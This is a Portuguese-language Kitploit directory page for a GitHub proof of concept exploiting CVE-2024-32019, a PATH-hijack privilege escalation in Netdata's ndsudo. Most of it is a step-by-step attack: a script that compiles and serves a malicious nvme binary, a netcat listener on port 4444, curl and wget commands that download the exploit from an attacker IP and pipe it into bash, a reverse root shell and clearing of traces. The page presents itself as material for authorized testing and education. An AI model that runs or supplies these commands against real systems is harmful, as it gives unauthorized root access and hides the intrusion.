Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32019-PoC — Script Bash para Escalação de Privilégios via "ndsudo" (Netdata Local Exploit) | Kitploit
Ferramentas/GitHubGitHub/80ottanta80/cve-2024-32019-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHub80ottanta80/cve-2024-32019-poc

CVE-2024-32019-PoC

Script Bash para Escalação de Privilégios via "ndsudo" (Netdata Local Exploit)

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-32019-PoC

Script Bash para Escalação de Privilégios via "ndsudo" (Exploit Local do Netdata)

Versões Afetadas do Netdata

  • >= v1.45.0, < v1.45.3

  • >= v1.44.0-60, < v1.45.0-169

Descrição da Vulnerabilidade

A ferramenta "ndsudo" executa um conjunto restrito de comandos externos, mas os caminhos de pesquisa são fornecidos pela variável de ambiente "PATH".

Alterando a variável de ambiente "PATH" para um caminho ao qual temos acesso, podemos controlar onde o ndsudo procura pelos comandos e criar um que contenha código malicioso.

Prova de Conceito

Este exploit baseia-se na suposição de que a máquina alvo e a máquina do atacante estão na mesma rede.

Pré-requisitos

Máquina do Atacante

  • Listener na porta 4444
  • Servidor web hospedando o binário nvme malicioso

Máquina Alvo:

  • Acesso a shell local
  • Permissão para executar ndsudo
  • wget/curl/qualquer cliente HTTP para download do payload

Uso

Na Máquina do Atacante

Podemos gerar e implantar automaticamente os arquivos necessários para o ataque executando o "setup_exploit_server.sh"

root@kitploit:~
$ ./setup_exploit_server.sh YOUR_IP

--------- Exploit Infrastructure Setup by Ottanta ---------

[+] Using server IP: YOUR_IP
[+] Creating exploit directory: /tmp/exploit
[+] Creating ndsudo_pe.sh script file...
[+] Creating nvme.c exploit file...
[+] Compiling nvme binary...
[+] nvme binary compiled successfully
[+] Starting web server on port 80...
[+] Web server started with PID: 9350
[+] nvme binary is available at: http://YOUR_IP/nvme
[!] Now run the privilege escalation exploit in the victim terminal
[!] Make sure to start listener: nc -nlvp 4444

Press Enter to stop the web server and clean up...

Este script criará todos os arquivos necessários para o ataque configurados com o seu endereço IP.

Após implantar nosso servidor web, iniciamos um listener em outro shell:

root@kitploit:~
# We start a listener with Netcat, but you can use anything else
$ nc -nlvp 4444
listening on [any] 4444 ...

Na Máquina Alvo

Dependendo do nosso cliente HTTP, podemos baixar e executar nosso exploit.

root@kitploit:~
# If we have curl
$ curl -L http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

# If we have wget
$ wget -qO- http://YOUR_IP/ndsudo_pe.sh | bash -s -- YOUR_IP

Se tudo foi feito corretamente, agora devemos ter um shell root.

texto alternativo

Fluxo do Exploit

  1. Baixa o binário malicioso para /tmp/exploit/
  2. Modifica o PATH para priorizar o diretório controlado
  3. Executa ndsudo nvme-list que executa o binário malicioso
  4. Estabelece um shell reverso para a máquina do atacante
  5. Limpa rastros

Referência

  • https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
  • https://nvd.nist.gov/vuln/detail/CVE-2024-32019

Aviso Legal

Esta prova de conceito é apenas para fins educacionais e de teste autorizado.

O uso não autorizado contra sistemas que você não possui ou não tem permissão explícita para testar é ilegal.

Os autores não são responsáveis por qualquer uso indevido destas informações.

Baixar ferramenta